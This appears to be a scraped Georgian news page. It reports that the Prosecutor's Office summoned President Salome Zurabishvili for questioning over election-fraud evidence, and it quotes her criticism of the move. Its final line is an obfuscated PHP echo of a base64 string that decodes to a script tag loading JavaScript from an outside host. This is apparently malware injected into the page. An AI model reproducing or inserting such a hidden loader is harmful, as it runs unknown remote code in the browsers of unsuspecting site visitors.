celsiusi
ავერსი საქკაბელი

უცნაურია, რომ პროკურატურა ცესკოს წუხილის საფუძველზე იწყებს გამოძიებას და არა არჩევნების სისტემური ფაქტებზე - ასე შეაფასა პრეზიდენტმა საგამოძიებო უწყების მიერ პროკურატურაში დაბარება. 

საქართველოს მთავარმა პროკურატურამ პრეზიდენტი სალომე ზურაბიშვილი გამოკითხვაზე დაიბარა. როგორც პროკურატურის განცხადებაში წერია, ცესკო-ს განცხადებისა და საჯარო სივრცეში მასმედიის მეშვეობით გავრცელებული ინფორმაციის თანახმად, საქართველოს პრეზიდენტი, სალომე ზურაბიშვილი უნდა ფლობდეს მტკიცებულებებს.

სალომე ზურაბიშვილის თქმით, არ სმენია არც ერთი პრეცედენტი, საგამოძიებო უწყება პრეზიდენტს სთხოვდეს არჩევნების გაყალბების მტკიცებულებებს.

"თურმე, პროკურატურა ჩემგან ელოდება მტკიცებულებებს. მე, ვიცოდი, რომ პირიქითაა. საგამოძიებო ორგანომ, თვითონ უნდა მოიპოვოს მტკიცებულებები, ნებისმიერ ნორმალურ ქვეყანაში ასე ხდება. სიმართლე გითხრათ, არ გამიგია, არც ერთი პრეცედენტი საგამოძიებო უწყება პრეზიდენტს სთხოვდეს არჩევნების გაყალბების მტკიცებულებებს.

ახლა ვუსმენდი ჟოზეფ ბორელს და მგონი, მასაც უნდა ჰკითხოს პროკურატურამ, იქნებ მასაც გააჩნია ბევრი მტკიცებულება.

კიდევ უფრო უცნაურია, რომ პროკურატურა ცესკოს წუხილის საფუძველზე იწყებს გამოძიებას, თითქოს ხდება მისი დისკრედიტაცია. რატომ დისკრედიტაცია არ ვიცი. ეს ფაქტებია, რომელიც ყველამ იცის. საერთოდ, პროკურატურამ უნდა დაიწყოს გამოძიება დარღვევების გამო. ცესკოს დისკრედიტაცია მხოლოდ სისტემური გაყალბების დადასტურებას შეიძლება მოჰყვეს", - განაცხადა პრეზიდენტმა.

116
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");